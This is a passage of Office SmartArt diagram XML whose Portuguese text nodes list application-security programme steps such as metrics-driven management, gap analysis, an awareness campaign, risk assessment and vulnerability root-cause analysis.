    <dgm:pt modelId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Gerenciar usando métricas. Efetuar melhorias e decisões de investimento baseadas nas métricas e análises dos dados capturados. Métricas incluem aderência às atividades e práticas seguras, vulnerabilidades introduzidas, vulnerabilidades mitigadas, abrangência da aplicação, densidade de defeitos por contagem de tipo e instância, etc. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" type="parTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}" type="sibTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Conduzir uma  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>análise de diferenças de capacitação, comparando sua organização com outras semelhantes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, definindo áreas chave para  melhorias e um plano de execução. </a:t>
          </a:r>
          <a:endParaRPr lang="pt-BR" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" type="parTrans" cxnId="{26ABB8A4-2126-4601-8276-CB099BFB0770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}" type="sibTrans" cxnId="{26ABB8A4-2126-4601-8276-CB099BFB0770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29D76988-94EC-456A-9326-82A5AA778D9E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Obter aprovação da liderança e estabelecer uma </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>campanha de conscientização em segurança de aplicações </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>para toda a organização de TI. </a:t>
          </a:r>
          <a:endParaRPr lang="pt-BR" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" type="parTrans" cxnId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41E4CEE4-E668-414D-904A-3A62818B4066}" type="sibTrans" cxnId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{168F1251-0689-442A-B8FC-0A781112776D}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Criar um modelo de avaliação de risco em aplicações para medir e priorizar as aplicações do portfolio. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48643092-65B8-42CE-8E35-AA9211C4F6F6}" type="parTrans" cxnId="{2D4DB1DF-DBCD-4FE0-B938-0EEDA5949E76}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A16CAF8-C7C7-4B9C-A977-34CB2964E0E1}" type="sibTrans" cxnId="{2D4DB1DF-DBCD-4FE0-B938-0EEDA5949E76}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Estabelecer diretrizes de segurança com o fim de definir a cobertura e o nível de rigor necessários.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{070C93F6-752D-4DBB-9D29-5B772454B72B}" type="parTrans" cxnId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7732DA14-DAD9-46E0-81D8-10D0187DA04D}" type="sibTrans" cxnId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C748F4BA-955C-4501-A037-0FFAA9192ED9}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Analisar dados das atividades de implementação e verificação procurando por causas raiz e padrões de vulnerabilidade com o fim de conduzir as melhorias estratégica e sistematicamente em toda a empresa.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78EE1EBE-0D6E-4B27-BE70-0B146F5024AB}" type="parTrans" cxnId="{87F101B5-D9C8-4E97-A471-7B15F3A72AED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9024B6C-0A69-4A4F-ADE8-F4DDBB1AC240}" type="sibTrans" cxnId="{87F101B5-D9C8-4E97-A471-7B15F3A72AED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" type="pres">
      <dgm:prSet presAssocID="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5" custScaleX="29073">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" type="pres">
      <dgm:prSet presAssocID="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" type="pres">
      <dgm:prSet presAssocID="{D22B1E2D-9241-472F-8A9E-565E70887137}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" type="pres">
      <dgm:prSet presAssocID="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" type="pres">
      <dgm:prSet presAssocID="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5" custScaleY="106040">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{55D812B4-A397-4BC3-91E7-51B20288021D}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{26ABB8A4-2126-4601-8276-CB099BFB0770}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" srcOrd="1" destOrd="0" parTransId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" sibTransId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}"/>
    <dgm:cxn modelId="{A66D96D6-32DA-4F60-9AB8-30FAD1B2A397}" type="presOf" srcId="{C748F4BA-955C-4501-A037-0FFAA9192ED9}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0D9A910F-6C96-421B-B11F-B36BE415366E}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B7DFEBD0-5096-4AEF-9A38-B8D37BC9D0C7}" type="presOf" srcId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" srcOrd="3" destOrd="0" parTransId="{7BC25BDC-3278-4082-B675-15E8A5144241}" sibTransId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}"/>
    <dgm:cxn modelId="{974808D5-164A-4F67-ADBF-3D9196B21DFD}" type="presOf" srcId="{168F1251-0689-442A-B8FC-0A781112776D}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{25DE1D4E-04CC-4912-A0A3-5BC9E7682832}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" srcOrd="0" destOrd="0" parTransId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" sibTransId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}"/>
    <dgm:cxn modelId="{F79C3E61-EED6-4366-BB90-D54CB87744A5}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{037BDB8F-830F-44B2-9861-7E6A03948B87}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" srcOrd="1" destOrd="0" parTransId="{D596540A-BB15-4E6E-8AD1-6C9E49AFC4B6}" sibTransId="{D74C2B73-3ED0-4D65-BFF8-1F8F86CFC71F}"/>
    <dgm:cxn modelId="{2D4DB1DF-DBCD-4FE0-B938-0EEDA5949E76}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{168F1251-0689-442A-B8FC-0A781112776D}" srcOrd="1" destOrd="0" parTransId="{48643092-65B8-42CE-8E35-AA9211C4F6F6}" sibTransId="{2A16CAF8-C7C7-4B9C-A977-34CB2964E0E1}"/>
    <dgm:cxn modelId="{5B061A49-E3D8-47C7-9791-1621D00F4187}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{9CB74495-237D-4F40-98F9-915162C6F1AD}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" srcOrd="1" destOrd="0" parTransId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" sibTransId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615}"/>
    <dgm:cxn modelId="{68D71606-5C52-434C-93A7-B1ED203D82B8}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" srcOrd="0" destOrd="0" parTransId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" sibTransId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}"/>
    <dgm:cxn modelId="{9CC73333-8B9D-4FC1-BAF6-54809D40B60E}" type="presOf" srcId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FCF84ECD-2A01-47F9-AC92-CC8D3F56FFC6}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" srcOrd="0" destOrd="0" parTransId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" sibTransId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}"/>
    <dgm:cxn modelId="{B67F351C-7762-415C-BE4F-243D3FFB73D6}" type="presOf" srcId="{9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6B615E07-FF0C-4A71-B01C-33C9BF9280D4}" type="presOf" srcId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" srcOrd="0" destOrd="0" parTransId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" sibTransId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}"/>
    <dgm:cxn modelId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" srcOrd="4" destOrd="0" parTransId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" sibTransId="{A003834B-8490-4CC6-B531-19539D19FBD4}"/>
    <dgm:cxn modelId="{1F999689-DD63-4A48-8C4A-F908FCA74B20}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
